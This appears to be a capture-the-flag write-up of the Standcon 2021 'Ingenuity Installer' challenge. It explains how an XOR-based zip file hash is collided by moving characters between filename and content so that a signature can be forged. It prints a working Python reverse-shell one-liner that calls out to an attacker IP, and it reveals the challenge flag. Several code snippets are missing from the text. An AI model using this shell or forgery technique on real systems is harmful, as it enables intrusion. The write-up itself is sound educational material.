Ingenuity Installer

This is a challenge from Cryptography section of Standcon 2021. The challenge wants us to forge a signature of a zip file.


I’ve always wanted to drive a vehicle on another planet! I found the website they used to install software on Ingenuity. Could you help me get access to it pretty please?


First thing to do is to try to break the public key. It might be misconfigured RSA.

We can use RSACtfTool to do this. But unfortunately, it is not vulnerable.

Usually if the private key is not retrivable, the only thing left for us to do is to try and exploit the hash function.

Observe that the hash function works by xor the hash for every files in the zip… This looks sus


And indeed it is vulnerable! The idea is to create two identical file so that their hash will be cancelled after xor both of them together.

But how do we create 2 identical file? As we have the restriction to not able to create 2 files with the same name…

Let’s check the hash again,

contents =
h =

This means that it is actually doing hash(file.encode() + file.content()).

And file.encode() is just the filepath of the file!

So we can just modify the filename to create 2 files with the same hash!


If we have a file


The hash will be hash('' + 'print('hello')')

The identical file can be



The hash will be hash('setup_scr' + 'ipt.pyprint('hello')')

These 2 files will have the same hash!

The challenge also provided us a valid zip with a valid signature. We need to insert our own with a reverse shell script to gain access to the server.

So how do we do with the old

Modify the filename!

Reverse shell script

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",12321));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")

In the end we get the shell and find the flag first with this command

find / -name "flag*" 2>/dev/null

Then we cat out the flag.

flag : STC{my_b4773ry_15_l0w_4nd_175_63771n6_d4rk}